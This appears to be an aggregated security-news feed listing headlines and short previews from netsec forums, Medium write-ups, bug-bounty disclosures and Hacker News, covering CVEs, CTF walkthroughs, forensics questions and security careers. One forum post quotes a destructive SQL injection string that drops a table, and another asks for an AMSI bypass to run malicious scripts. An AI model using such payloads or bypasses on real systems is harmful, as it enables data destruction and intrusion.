    The red team is regarded as the aggressive part of the security apparatus. Continue reading on TheSecMaster »
    VulnHub’s Vegeta: 1
    Vegeta is one of the vulnerable boxes on VulnHub. VulnHub advertises “This box is an easy box for the complete beginner.” Vegeta is what I… Continue reading on Medium »
  • Open

    Java and .NET Vulnerabilities Persist Longer than JavaSc
    Research shows that Java and .Net vulnerabilities occur more often and are left un-fixed more frequently than languages like Javascript… Continue reading on System Weakness »
  • Open

    Java and .NET Vulnerabilities Persist Longer than JavaSc
    Research shows that Java and .Net vulnerabilities occur more often and are left un-fixed more frequently than languages like Javascript… Continue reading on System Weakness »
  • Open

    Ptrace Injection CTF Challenge Walkthrough
    submitted by /u/ragnarsecurity [link] [comments]
  • Open

    With the influx of post being question about DFIR and career advice I made a survey.
    Made a survey to get a feel on the DFIR industry and salary. You can fill it out here I want to try to get an Idea of salary ranges and backgrounds of people in the field. This may work out, it may not but made a google form if you can just fill it out. The questions if anyone has a question they think I should add let me know: Education background How many years have you been in the DFIR field Do you hold any certifications from the following vendors Are you currently happy with your current job Would you consider yourself overworked or burnt out What is your current salary What is your job role (select all the applies) Role level Do you feel underpaid How many times have you swapped jobs/companies Are you Law Enforcement or Private Sector What advice would you have for recent graduates or newcomers to the DFIR community I'll be closing this out Feb 1st and then supply the results. submitted by /u/MDCDF [link] [comments]
  • Open

    k8s 基于 cgroup 限制资源使用量(capacity enforcement):模型设计与代码实现(2023)
    1 引言 2 k8s 资源模型 2.1 Node 资源抽象 2.1.1 Capacity 2.1.2 Allocatable 2.1.3 Allocated 2.2 Node 资源切分(预留) 2.2.1 SystemReserved 2.2.2 KubeReserved 2.2.3 EvictionThreshold(驱逐门限) 2.2.4 Allocatable 2.3 kubelet 相关配置参数 3 k8s cgroup 层次设计 3.1 cgroup 基础 3.2 kubelet cgroup runtime driver 3.3 kubelet cgroup 层级 3.1.1 Container 级别 cgroup 3.1.2 Pod 级别 cgroup 3.1.3 QoS 级别 cgroup 3.1.4 Node 级别 cgroup 3.3 cgroup (v1) 配置目录 3.3.1 kubelet cgroup root 3.3.2 /kubepods(node 级别配置) 3.3.3 QoS 级别配置 3.3.4 Pod 级别配置 3.3.5 Container 级别配置 4. 问题讨论 4.1 requests/limits 对应到具体 cgroup 配置文件 4.1.1 CPU 4.1.2 Memory 4.1.3 其他 4.2 requests/limits 与调度的关系 4.2.1 根据 requests 调度 4.2.2 根据 limits 限额(enforcement) 4.3 kubelet 计算 pod requets/limits 的过程 4.4 资源使用量超出 limits 的后果 4.5 Node 资源紧张时,按 …

  • Open

    Takeover — TryHackMe Simple Writeup | 2023
    TryHackMe’s Takeover Simple Walkthrough | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    Exploring Network Security with Nmap Commands: Ethical Hackers(Beginners) Must Know
    I’ve already discussed the legion tool. It is a tool for scanning targets via a graphical user interface. View it now Continue reading on Medium »
    Penetrating firewalls and discovering secrets Concepts — The Nmap Ninja
    Nmap, which stands for Network Mapper, is a free and open source programme used for port scanning, vulnerability analysis, and, obviously… Continue reading on Medium »
    Simple SQL Injection Vulnerability in WHERE clause allowing retrieval of hidden data | 2023
    Portswigger Lab Simple Solution — SQL Injection | Karthikeyan Nagaraj Continue reading on Medium »
    Explaining vulnerabilities : IDORs {Bug bounties}
    What are IDORs? Continue reading on Medium »
    Bypassing a Creation Limit on Free Accounts: A Race Condition Vulnerability in Bug Bounty Program
    The following vulnerability was reported in a self-hosted bug bounty program. The program reported that it was a duplicate. I find it… Continue reading on Medium »
  • Open

    Inspecting http traffic from mobile phone applications
    Hi all, I would like to learn little bit about network communication from the mobile device applications (so probably http/s calls to remote applications APIs). What are the possibilties to intercept mobile device by some tracing network tool capturing remote network calls? I'm not sure, if something like this exists directly as mobile application, but I mean something like Burp suite, where I can point my mobile phone and capture all exchanged traffic. For testing I would use my old rooted OnePlus One mobile). Does anyone have experience with similar setup? submitted by /u/woky_s [link] [comments]
    How to combat repeat brute force attempts in your company?
    Hi We are utilising hybrid cloud in our company so we are using Azure AD with on-prem AD sync Recently, I noticed a lot of repeat brute force attempts on a few of our users Was wondering what measures I could implement within Azure AD What do you do your in company, should I put an account lockout or implement a timer which locks the account temporarily and makes the user call IT? submitted by /u/moneyzaa [link] [comments]
    Best software or tool to present phishing campaign data
    Just wondering what u guys use to make a report of data from phishing campaigns or any other data. I tried PowerBI but my manager didn’t like it. I just want a nice visual with charts and bars so it looks good when presenting. Any thoughts? submitted by /u/Puzzleheaded-Try5749 [link] [comments]
    Identifying unknown 2FA SMS messages?
    Hi /r/netsec! Over the last month or so, I've received a handful of SMS messages that seem to be 2FA-related, and that I don't recognize (and didn't request myself). I'm wondering whether I should be worried, and if so how I should best proceed. The SMS messages are from the number 59872 and are formatted as follows: ALERT! DO NOT share this code with anyone. We will never ask you for this code. Verification Code: XXXXXX (expires in 3 minutes) (X's represent the redacted code.) Around the same time as one of these message, I also received one phone call (not answered) from +1 (714) 707-3260 with caller ID "Verify", along with a voice message that just says 4 digits and then "Goodbye". I can think of a few possibilities for what's going on: Someone has my password for some serv…
  • Open

    No iMessages in iCloud Backups - Solution
    Just posting it here because I have had other experts asking about it. There is a thing called iMessage Cloud sync where Apple will not include iMessages in backups but "sync" the data in the cloud. If you use a tool like Elcomsoft PPB to download the backup you won't get the messages. You can download the messages using the "Download Sync'd data" function but it is a pain in the ass to work with and parse. The counter-intuitive solution is to have the user go on the phone, (assuming that you don't have direct access to the phone which is why you are doing iCloud in the first place, and need to have the user do it,) and go to iCloud settings, there is a slider bar for messages and you need to turn it off. Yes it seems weird but you need to turn off messages. You will then get a warning that says your messages will no longer be stored in the cloud. Wait overnight for the phone to do a regular backup and the messages and attachments should all be there. I did one this week that was 4gb before turning messages off and 30gb after. The second iCloud download had all the stuff I was looking for. ​ TLDR: Before you download an iCloud as an alternative to copying a phone directly, make sure the slider for iMessages is OFF in the settings, it is counter-intuitive but Apple won't back up the messages to iCloud unless that is off. It may be that you have them check, if it is on, cut it off and call them back the next day. Let me know if anyone has any questions. submitted by /u/ellingtond [link] [comments]
    FTK Imager Lite still around?
    So I'm being asked to use FTK Image Lite to search for some data on our share but I'm not able to find a "free" download for it that doesn't seem sketchy. Is it still a free product? Anyone have a good link? submitted by /u/SomeWhereInSC [link] [comments]
    Synchronization iPhone
    Hi all, Where on an iPhone (an iPhone 5 to be exact) is stored what the phone syncs with and what exactly is synced. Thanks in advance submitted by /u/AartdB [link] [comments]
    Questions about printer steganography
    Hi, Read an article mentioning printer steganography, read more articles/pages about this https://en.wikipedia.org/wiki/Machine_Identification_Code https://www.bbc.com/future/article/20170607-why-printers-add-secret-tracking-dots https://blog.erratasec.com/2017/06/how-intercept-outed-reality-winner.html#.Y8-t4oTP3QF https://www.eff.org/pages/list-printers-which-do-or-do-not-display-tracking-dots Now it seems that this was primarily done to tackle the counterfeit currency problems only in colored laser printers. Here are my two questions- As per the last link above, all the printers in that list (which is not being updated anymore) are colored laser printers. They were not doing this in inkjet printers? Black and white laser and inkjet printers cannot be used to print currency for obvious reasons. But are they leaving identifiers like this https://upload.wikimedia.org/wikipedia/commons/7/73/Machine_Identification_Code.png on black and white prints printed via black and white laser and inkjet printers? If yes then how to identify them? I don't have access to blue/uv light so cannot check and confirm. Thanks submitted by /u/becool773 [link] [comments]
  • Open

    Bypassing Cloudflare WAF: XSS via SQL Injection
    submitted by /u/plsaskmecom [link] [comments]
    GitHub - Free Python scanner for CVE-2022-47966
    submitted by /u/vonahisec [link] [comments]
    Operator’s Guide to the Meterpreter BOFLoader
    submitted by /u/n00py [link] [comments]
    CVE-2023-0210 – Linux Kernel Unauthenticated Remote Heap Overflow Within KSMBD
    submitted by /u/MiguelHzBz [link] [comments]
    Gato (Github Attack TOolkit), a tool to enumerate, attack, and defend GitHub Actions self-hosted runners
    submitted by /u/exploding_nun [link] [comments]
    A website to get latest security advisories from multiple sources
    submitted by /u/karimhabush [link] [comments]
    Tampering User Attributes In AWS Cognito User Pools
    submitted by /u/nibblesec [link] [comments]
    Reverse-engineering the conditional jump circuitry in the 8086 processor
    submitted by /u/Gallus [link] [comments]
    Bitwarden design flaw: Server side iterations
    submitted by /u/Gallus [link] [comments]
  • Open

    Detecting malicious artifacts using an ETW consumer in kernel mode
    submitted by /u/dmchell [link] [comments]
    Upcoming malware that’s not too known yet but feel may be a threat ?
    As title provided, I’m interested to hear your findings / thoughts! Doing research. submitted by /u/Cyberkitty08 [link] [comments]
  • Open

    SecWiki News 2023-01-24 Review
    SecWiki周刊(第464期) by ourren CVE-2022-41080_41082 Microsoft Exchange Server OWASSRF远程代码执行漏洞分析 by ourren 自动化提取恶意文档中的shellcode by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-24 Review
    SecWiki周刊(第464期) by ourren CVE-2022-41080_41082 Microsoft Exchange Server OWASSRF远程代码执行漏洞分析 by ourren 自动化提取恶意文档中的shellcode by ourren 更多最新文章,请访问SecWiki
  • Open

    Rust Vulnerability Analysis and Maturity Challenges
    Article URL: https://insights.sei.cmu.edu/blog/rust-vulnerability-analysis-and-maturity-challenges/ Comments URL: https://news.ycombinator.com/item?id=34505093 Points: 2 # Comments: 0
  • Open

    CVE-2023-0210 – Linux Kernel Unauthenticated Remote Heap Overflow Within Ksmbd
    Article URL: https://sysdig.com/blog/cve-2023-0210-linux-kernel-unauthenticated-remote-heap-overflow/ Comments URL: https://news.ycombinator.com/item?id=34504964 Points: 6 # Comments: 0
    Pkgconf, CVE-2023-24056 and disinformation
    Article URL: https://ariadne.space/2023/01/24/pkgconf-cve-2023-24056-and-disinformation/ Comments URL: https://news.ycombinator.com/item?id=34503115 Points: 5 # Comments: 0
  • Open

    Realtek SDK Vulnerability Attacks Highlight IoT Supply Chain Threats
    We observed a recent spate of supply chain attacks attempting to exploit CVE-2021-35394, affecting IoT devices with chipsets made by Realtek. The post Realtek SDK Vulnerability Attacks Highlight IoT Supply Chain Threats appeared first on Unit 42.
  • Open

    Operator’s Guide to the Meterpreter BOFLoader
    1.1      Introduction Recently, myself and a few friends decided to port my coworker Kevin Haubris‘ COFFLoader project to Metasploit. This new BOFLoader extension allows Beacon Object Files (BOFs) to be used from a Meterpreter session. This addition unlocks many new possibilities for Meterpreter and, in my opinion, elevates Meterpreter back up to the status of... The post Operator’s Guide to the Meterpreter BOFLoader appeared first on TrustedSec.
  • Open

    Casino Download X
    When you go online to find new games, there is no shortage of results, quite the opposite. There are so many sites and games that it can… Continue reading on Medium »
  • Open

    Using special IPv4-mapped IPv6 addresses to bypass local IP ban
    Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1785260 - Bounty: $7500
  • Open

    ChatGPT + Python to Automate Fuzz Testing Setup
    I used ChatGPT to write a Python script to help automate the setup for copying code from GitHub and setting up the fuzzer CI Fuzz CLI. Continue reading on Medium »
  • Open

    ChatGPT + Python to Automate Fuzz Testing Setup
    I used ChatGPT to write a Python script to help automate the setup for copying code from GitHub and setting up the fuzzer CI Fuzz CLI. Continue reading on Medium »
  • Open

    Review: EliteGhost CTF 2023
    This is review for OSINT challenges in EG CTF 2023 Continue reading on Medium »
  • Open

    Basic SSTI — Server-Side Template Injection | 2023
    No content preview
    Clipboard Hijacking
    What it is, how to do it, and how to prevent it Continue reading on InfoSec Write-ups »
    Malware Alert: Recognizing the Tell-Tale Signs of an Infection
    No content preview
    I tried to squiz the best from the most bizzar CVE I ever seen (CVE-2021–38759)
    No content preview
    Signal Client v6.2 and earlier versions vulnerable to CVE-2023–24068 & CVE-2023–24069
    No content preview
  • Open

    Basic SSTI — Server-Side Template Injection | 2023
    No content preview
    Clipboard Hijacking
    What it is, how to do it, and how to prevent it Continue reading on InfoSec Write-ups »
    Malware Alert: Recognizing the Tell-Tale Signs of an Infection
    No content preview
    I tried to squiz the best from the most bizzar CVE I ever seen (CVE-2021–38759)
    No content preview
    Signal Client v6.2 and earlier versions vulnerable to CVE-2023–24068 & CVE-2023–24069
    No content preview
  • Open

    Basic SSTI — Server-Side Template Injection | 2023
    No content preview
    Clipboard Hijacking
    What it is, how to do it, and how to prevent it Continue reading on InfoSec Write-ups »
    Malware Alert: Recognizing the Tell-Tale Signs of an Infection
    No content preview
    I tried to squiz the best from the most bizzar CVE I ever seen (CVE-2021–38759)
    No content preview
    Signal Client v6.2 and earlier versions vulnerable to CVE-2023–24068 & CVE-2023–24069
    No content preview
  • Open

    Firmwares for random stuff
    submitted by /u/themariocrafter [link] [comments]
    Cats are cute: CPU/MEM infos, 2 APKs, screenshots, discord logs
    submitted by /u/themariocrafter [link] [comments]
    Tons of French D1sney Movies on a fast NL Seedbox
    submitted by /u/mingaminga [link] [comments]

  • Open

    Utilizing Obsidian in Malware
    submitted by /u/CosmodiumCS [link] [comments]
    Tips to stay safe while working with malware samples.
    Use different OS on the host machine than your analysis VM --> most malware will not be able to run there Use a different machine for malware analysis (even if analysis happens in VM) than for your other work or private stuff Make sure the analysis machine is not connected to the company network or your personal network. If you transfer files via USB flash drives, mark malware USB flash drives. E.g. red ones mean they are used to carry samples Be aware that those flash drives will become infected by worms If you transfer malware files via shared folder, make the folder readable only for the analysis VM. Be aware that writeable folders will become infected by worms, viruses or encrypted by ransomware. On Windows, use ACL to prevent execution. This will not prevent A…
  • Open

    Mastodon server for hacking community
    submitted by /u/n4bb [link] [comments]
    Pwning the all Google phone with a non-Google bug | The GitHub Blog
    submitted by /u/smaury [link] [comments]
    A step-by-step introduction to the use of ROP gadgets to bypass DEP
    submitted by /u/CyberMasterV [link] [comments]
    NSA CSI IPv6 Security Guidance
    submitted by /u/sanitybit [link] [comments]
    OSINT Search Engine | Cylect.io
    submitted by /u/brekfasbaksetz [link] [comments]
  • Open

    [song.link] Open Redirect
    Linktree disclosed a bug submitted by 0xshdax: https://hackerone.com/reports/1699025 - Bounty: $400
    XSS on link and window.opener
    Slack disclosed a bug submitted by pisarenko: https://hackerone.com/reports/834071 - Bounty: $1000
  • Open

    Documents and media from iCloud device backup parsed in Cellebrite missing date/time metadata
    Recently, I've observed missing file system date/time metadata for local media and documents from iCloud device backups parsed in up to date Cellebrite PA. Has anyone else experienced this? If so, any proposed remedies? The iCloud device backups are pulled using the latest release of Elcomsoft PB. Internal metadata is fine, as expected. It's the external dates and times recorded by the iPhone file system that I'm not seeing anymore. submitted by /u/zero-skill-samus [link] [comments]
    Interview tips for upcoming interview with the NY district attorney
    I’m having an interview with the Bronx da for a digital forensics examiner role. I only have around 2 years of experience mostly dealing with cyber security incidents and malware analysis, however I’m very familiar with Mobile forensics and computer forensics in criminal cases. Any tips on how to stand out and succeed ? submitted by /u/Lightyagami228 [link] [comments]
    EZ Tools Manuals Interview with Andrew Rathbun
    A new 13Cubed Interview is now publicly available! In this video, I talk with Andrew Rathbun about the EZ Tools Manuals he's written, as well as other DFIR community projects! https://www.youtube.com/watch?v=Mz5hin8Wxak submitted by /u/13Cubed [link] [comments]
    Glide and VolleyCache Forensics
    I'm looking at the results of an android acquisition. Images were carved out of the VolleyCache subfolder for the youtube application. The files that exist in the volleycache folder typically end in .0. From what I've read, this is the raw image from the youtube server. My question is, the dates and times that appear in that raw image do not correspond to the MAC dates of the .0 file. There are two dates within that .0 image. The first date appears under Access-control-allow-origin, and the second date under "Expires". I'm more concerned with the first date (under access-control-allow-origin) than the "expires" date. What does that date reflect? Is this the date/time of the image as it exists on the youtube server? https://preview.redd.it/b9i2wcmsjsda1.jpg?width=337&format=pjpg&auto=webp&s=30be83ac494d458f28c1f2608f601e7577fab872 submitted by /u/IndividualHedgehog19 [link] [comments]
  • Open

    #1 The Monday Hunt—IDOR-able escapade
    For those who are not familiar, an IDOR, or Insecure Direct Object Reference, is like a secret door in a website that should be locked… Continue reading on Medium »
    From Failure to Success: My Experience with the HTB CBBH
    Hello everyone, my name is Hac and in this post, I will be sharing my experience with the HTB CBBH exam, which is a practical web… Continue reading on InfoSec Write-ups »
    Why Companies Should Adopt a Bug Bounty Program
    In the world of cybersecurity, one of the most effective strategies for catching potential breaches is a bug bounty program. A bug bounty… Continue reading on Medium »
    A python code that scraps for my password and secrets on GitHub.
    Today am showing you how youcan make your own github scrapper in python. Continue reading on Medium »
    Understanding the XSS Threat: A Comprehensive Guide to DOM Based Cross Site Scripting Vulnerability
    Cross-site scripting (XSS) has become one of the most common security vulnerabilities and a major threat to online security. It is a type… Continue reading on Medium »
    How i Hacked Scopely using “Sign in with Google”
    how i access any account via visiting malicious link and hacked their gmail accounts via abusing “Sign in with Google”. Continue reading on Medium »
    CAPTCHA
    What is CAPTCHA? Continue reading on Medium »
    Finding More IDORs – Tips And Tricks ($100/Day)
    Technical Tips Continue reading on Medium »
  • Open

    Broken Object Level Authorization [API SECURITY — 0x1]
    No content preview
    From Failure to Success: My Experience with the HTB CBBH
    No content preview
    Breaking into Cybersecurity as a Developer
    I just finished my first year working as security engineer and wanted to give a recap of all the things I did to get into my current role… Continue reading on InfoSec Write-ups »
    Decrypting HTTPS Traffic as A Hacker
    No content preview
  • Open

    Broken Object Level Authorization [API SECURITY — 0x1]
    No content preview
    From Failure to Success: My Experience with the HTB CBBH
    No content preview
    Breaking into Cybersecurity as a Developer
    I just finished my first year working as security engineer and wanted to give a recap of all the things I did to get into my current role… Continue reading on InfoSec Write-ups »
    Decrypting HTTPS Traffic as A Hacker
    No content preview
  • Open

    Broken Object Level Authorization [API SECURITY — 0x1]
    No content preview
    From Failure to Success: My Experience with the HTB CBBH
    No content preview
    Breaking into Cybersecurity as a Developer
    I just finished my first year working as security engineer and wanted to give a recap of all the things I did to get into my current role… Continue reading on InfoSec Write-ups »
    Decrypting HTTPS Traffic as A Hacker
    No content preview
  • Open

    CVE-2021-21551 - Privilege escalation exploit for physical memory read/write vulnerability
    https://github.com/nanabingies/CVE-2021-21551 submitted by /u/nanabingies [link] [comments]
  • Open

    Chronolocation and geolocation — solution to Quiztime OSINT challenge 28/11/2022
    Chronolocation and geolocation used to solve a Quiztime OSINT challenge Continue reading on Medium »
    Defending Against Web Scraping Attacks
    Attackers can use web scraping to launch attacks on an organization. Continue reading on Medium »
  • Open

    Vaporwave music
    https://vaporwave.ivan.moe/list/ submitted by /u/Waste-Release-6235 [link] [comments]
    Advanced Data Analysis course from University of St. Andrews
    submitted by /u/dudewithoneleg [link] [comments]
  • Open

    再度思考CSMA(Cyber Security Mesh Architecture)
    1、厘清概念CSMA是Gartner去年提出的重要战略技术趋势之一,全称Cyber Security Mesh Architecture,网络安全矩阵架构。矩阵,在英文中有两个词:Grid,Mesh。其中,Grid代表矩阵内都是同类型元素,Mesh有异构的含义。因此,从这里可以看出,CSMA之所以用Mesh,是指“不同类型的、异构的安全原子能力,有机的联系、协同起来组成安全矩阵”的意思。看看Gar
    云与信任--未来安全的战场
    内生安全,是我国科学家邬江兴院士针对网络空间安全现状的哲学性归纳与论述,包含内生安全问题和内生安全体制机制两部分内涵。
  • Open

    SecWiki News 2023-01-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Answers to Unit 42 Wireshark Quiz, January 2023
    The January 2023 Wireshark quiz analyzes a pcap of network traffic from an Agent Tesla-style infection. This post details the answers. The post Answers to Unit 42 Wireshark Quiz, January 2023 appeared first on Unit 42.
  • Open

    The problem with Smbmap
    When using Smbmap in your Red Team engagement, keep in mind, that Smbmap creates a random directory at the root of each SMB Share to check… Continue reading on Medium »
  • Open

    Grand Theft Auto V exploit assigned CVE number due to partial RCE
    Article URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24059 Comments URL: https://news.ycombinator.com/item?id=34484784 Points: 59 # Comments: 38

  • Open

    What is a career in cybersecurity like in the UK and how financially rewarding is it?
    Hi I recently saw an increase in demand for cybersecurity at the job centre, is it true that there is a shortage in this industry? What is the cybersecurity career path like in the UK and is it really financially rewarding? How is the stress? Thanks submitted by /u/fanduz [link] [comments]
    How to secure firmware?
    Firmware is a good place for malware to hide. firmware resides in obscure places, under the radar of most people (it’s hard to see where it even exists). operating systems have no control over the firmware and caves in which they reside a lot of time the firmware is old and doesn’t receive updates (if it does, repositories are not clear) it’s often closed source and proprietary blob firmware survives OS reinstallation How to find the list of devices with firmware, verify the authenticity of the firmware software installed, and make sure there is no malware or root kit hidden anywhere in there? How difficult is it to install malware in firmware without physical access? submitted by /u/chaplin2 [link] [comments]
    Why don't more security folks discuss other dangers of storing passwords in plaintext such as second order type injections? Never understood that
    Like everywhere you see people freaking out about passwords being stored in plaintext but there's other implications of the password column in an SQL table being plaintext that hashing would of saved them from. One major example are second order injections. Things like second order stored XSS or second order SQL injection. The way these work is you would go to a /sign up endpoint and place an SQL statement in the password field basically signing up with the password ROBERT'); --DROP TABLE Students;-- typically it would immediately break the site upon sign up but most sign up forms are sanitized so it saves them temporarily however if we go to say an /updateprofile endpoint and the password is used in a SELECT statement unsanitized the tables would drop at this point. The key here is consistency and devs could easily make an off by one error and forget to escape one endpoint/page that's all it takes for a second order injection to pop up. I'm more surprised people just care about the passwords themselves being the issue and not the entire sites integrity there's like barely any discussion on this. submitted by /u/TheCrazyAcademic [link] [comments]
    A drowning, solitary security engineer seeking help
    Hi /r/AskNetsec, I'm the lone security engineer at an 800 person organization and I'm feeling overwhelmed. Here are my high level responsibilities: Security architecture and engineering. Building and improving our SIEM (no time to monitor, investigate, and close alerts), implementing recommendations to harden our cloud environment, proposing and implementing new configurations (like DLP and MDM) Compliance. SOC compliance, GDPR, CCPA, contracts, policy, third-party questionnaires, security and awareness training Identity and access management. Creating and updating conditional access, improving/troubleshooting MFA, secrets management, privileged identity management Vulnerability management. Remediating vulnerabilities on our endpoints and in the cloud, patching workstations, inspecti…
    How to know more about modern web applications
    Hi, sometimes, while playing with some box on HTB, I realize that I have a very little knowledge on modern webapp built with Node, JS, Angular, and so on. While it is a bit Off Topic, can anyone recommend me a good starting point to approach these technologies? Youtube channels, Udemy course, whatever. thankyou! submitted by /u/g-simon [link] [comments]
    When attackers gain access to a website, what prevents them from starting storing users passwords in plain text?
    I am very unfamiliar with security, especially with web servers, but I was wondering this: in the period between which attackers gain access and their presence is discovered, are they able to start storing passwords/credit card details in plaintext somewhere outside the server? I guess they technically could, but more specifically, would that be quickly very obvious to the administrators? submitted by /u/SteveSonOfJobs [link] [comments]
    Best AMSI bypass to run malicious scripts on windows?
    Hi, my oscp course requires to run a variety of scripts that contain amsi-triggering code like powercat. So I have searched for various AMSI bypasses and found quite a few. I am now wondering, is there in this community a preferred way to run such scripts that it's most safe or better for other unknown issues? submitted by /u/DerekFoReal777 [link] [comments]
    Frustrated PenTester
    Let's face it, pentesting is not interesting as we thought when heard about it for the first time. I remember when I had more free time I was able to learn more each day rather than by doing CTFs or reading writeups. However, diving into work especially when you spend a lot of your time in meetings or doing reports (paperwork) and also doing general sec stuff (if you're working in a small firm) you will feel that you're losing your touch and missing a lot. I felt that when recently was assigned to deliver a revShell during a social engineering assessment, defenses are becoming much smarter and the open source tools I've used earlier not working like before (with code editing), it literally that sometimes you have to write your custom tools which are not easy especially if you're not proficient with multiple programming languages (python) for me I think I need some sort of new training only on evasion but can't decide which programming language to pick ATM (Thinking of c# instead of python) Have you ever been in a similar position? submitted by /u/sicKurity [link] [comments]
  • Open

    Web Application Vulnerabilities -Bug Bounty Hunters (Beginners)Must Know
    What Are Web Application Vulnerabilities? Continue reading on Medium »
    Bypass Facebook locked profiles Post/Information
    Hello people Continue reading on Medium »
    Handy Tools for Beginner Bug Bounty Hunters
    As a novice bug bounty hunter or beginner level ethical hacker, it can be overwhelming to navigate the vast landscape of tools available… Continue reading on Medium »
    HTTP Request Smuggling — Basic CL.TE vulnerability
    Portswigger HTTP Request Smuggling Solution | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    Simple Web Challenge on HTB | Templated
    Hey folks, here is a simple web challenge for you… Continue reading on Medium »
    How i was able to get critical bug on google by get full access on [Google Cloud BI Hackathon]
    Hello Hunters , Hello Infosec Community Continue reading on Medium »
    Blog 07: Misc — JSON Web Token(JWT)
    Hey folks! Continue reading on Medium »
    How to approach the target APIs?
    https://mega.nz/file/ReYzXISb#eZYb7pbTzY9N5D6kzOSYR5IBWg6oliRGyqwguIeGZbs Continue reading on Medium »
    How I found XSS on Admin Page without login!
    Introduction Continue reading on Medium »
    Forget SQL Injection Have you Heard of Jwt Injections?
    JSON Web Tokens (JWT) are a popular method for authenticating and authorizing users in web applications. However, as with any technology… Continue reading on Medium »
    What is cross-site scripting (XSS)? Web App Pen-testing
    Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users… Continue reading on Medium »
  • Open

    Comparative fuzzing parallel Rust tools
    I previously wrote about how we can use Rust’s “fearless concurrency”, resulting in a tool called ripunzip. (Here are some performance… Continue reading on Medium »
    The Problem with Open Source Software Security
    Reporting vulnerabilities in open-source software is a nightmare. How can we make it better? Continue reading on Medium »
  • Open

    Comparative fuzzing parallel Rust tools
    I previously wrote about how we can use Rust’s “fearless concurrency”, resulting in a tool called ripunzip. (Here are some performance… Continue reading on Medium »
    The Problem with Open Source Software Security
    Reporting vulnerabilities in open-source software is a nightmare. How can we make it better? Continue reading on Medium »
  • Open

    Whats the policy on posting open government or international government directories?
    Like stuff that is presumably suppose to be confidential i.e court case docs submitted by /u/dudewithoneleg [link] [comments]
  • Open

    This Week in Open Source – DNEG's new tool, Kernel vulnerability, Debian 12
    Article URL: https://fossweekly.beehiiv.com/p/foss-weekly-32-kde-plasma-5-27-kernel-vulnerability-dneg-s-tool-and-more Comments URL: https://news.ycombinator.com/item?id=34481703 Points: 1 # Comments: 0
  • Open

    Unlocking ChatGPT: Advanced AI for Google Dorking & OSINT
    I’m sure you know, Security testers and investigators use Dorking (Google Hacking) to find sensitive information stored on websites… Continue reading on Medium »
    SPY NEWS: 2023 — Week 3
    Summary of the espionage-related news stories for the Week 3 (January 15–21) of 2023. Continue reading on Medium »
  • Open

    Autopsy: Make Call log readable from output
    How can I convert/translate this call log to numbers I as a human can read? I extracted the data using adb and now am looking at it in autopsy but it doesn't make it readable. Like what are the real phone numbers? For example: -incoming1-0:1672517017901074%e609af1cf9fd7ecdið·™; ¢ -incoming1-0:1672519798593364%e609af1cf9fd7ecdUÆ…e; £ -incoming1-0:1672520180877682%e609af1cf9fd7ecdG$N; ¤ -incoming1-0:1672520194778510%e609af1cf9fd7ecdD¸Ês; ¥ -incoming1-0:1672520243018075%e609af1cf9fd7ecdðÿq ¦ I think the other thing I can do is load a .json file to translate, but I cant figure out how to do it HELP PLEASE? submitted by /u/WATERSLYDPARADE [link] [comments]
  • Open

    Reflected XSS Leads to 3,000$ Bug Bounty Rewards from Microsoft Forms
    No content preview
    HTTP Request Smuggling — Basic CL.TE vulnerability
    No content preview
    Blockchain Security Best Practices: How to Secure Your Transactions in a Decentralized World
    No content preview
  • Open

    Reflected XSS Leads to 3,000$ Bug Bounty Rewards from Microsoft Forms
    No content preview
    HTTP Request Smuggling — Basic CL.TE vulnerability
    No content preview
    Blockchain Security Best Practices: How to Secure Your Transactions in a Decentralized World
    No content preview
  • Open

    Reflected XSS Leads to 3,000$ Bug Bounty Rewards from Microsoft Forms
    No content preview
    HTTP Request Smuggling — Basic CL.TE vulnerability
    No content preview
    Blockchain Security Best Practices: How to Secure Your Transactions in a Decentralized World
    No content preview
  • Open

    CVE-2020-36109 POC - ASUS routers stack overflow
    submitted by /u/NoPaleontologist7419 [link] [comments]
    CVE-2021-20294 POC - readelf stack overflow
    submitted by /u/NoPaleontologist7419 [link] [comments]
    (In)Security of the "Pass" password manager
    submitted by /u/Gallus [link] [comments]
    Studying Conformance of MANRS Members (routing security)
    submitted by /u/danyork [link] [comments]
    Git repository of Linux forensic/monitoring scripts (small side project for implementing ideas and testing stuff I read somewhere)
    submitted by /u/sqall01 [link] [comments]
    Using a service with markdown capabilities? Good chance it's vulnerable and attackers can easily take it down
    submitted by /u/roy_6472 [link] [comments]
  • Open

    Getting User’s NTLMv2 hash through LLMNR/NBT-NS Poisoning
    I will walk you through step-by-step guide to get user’s NTLMv2 hash using LLMNR/NBT-NS Poisoning and cracking it using John the Ripper. Continue reading on Medium »
  • Open

    SecWiki News 2023-01-22 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-22 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Apache HTTPD Changes for 2.4.55 including CVE-2022-37436 for mod_proxy
    Article URL: https://downloads.apache.org/httpd/CHANGES_2.4.55 Comments URL: https://news.ycombinator.com/item?id=34478456 Points: 2 # Comments: 0
  • Open

    How I found XSS on Admin Page without login!
    Introduction Continue reading on Medium »

  • Open

    What’s the point of using encrypted cloud storage if the OS can access local files anyway?
    I’m looking for a new privacy-focused cloud storage service that deploys zero knowledge end-to-end encryption. I must say that I’m having a hard time understanding the terms and technology behind cloud and encryption stuff, though I’m still curious and would like to learn more. While reading about the pros and cons of encrypted cloud services, a question came up to my mind regarding the effectiveness and purpose of encrypting files: I use Windows 10 as my main OS; I store all my data locally on the PC, as well as having an automatically synced (identical) copy in cloud. Now let’s say that I open a document locally, edit it, save, then upload (sync) to an encrypted cloud service (alternatively, encrypt via Cryptomator and upload to whichever cloud service). I understand that the file that I just worked on and uploaded to the cloud service is now “safe” provided that the cloud provider uses zero knowledge E2EE. However, I viewed and edited the file in Windows 10 in an unencrypted state. Does this mean that Windows / Microsoft did have full access to the file and can send or sell data and information about the content of the file regardless of the encryption that happened afterwards? If that’s the case, then how can I benefit from encrypted cloud storage / encryption software (like Cryptomator) if the operating system is going to have full access to the local *unencrypted* files anyway? Especially when my Microsoft account is associated with both my Windows copy 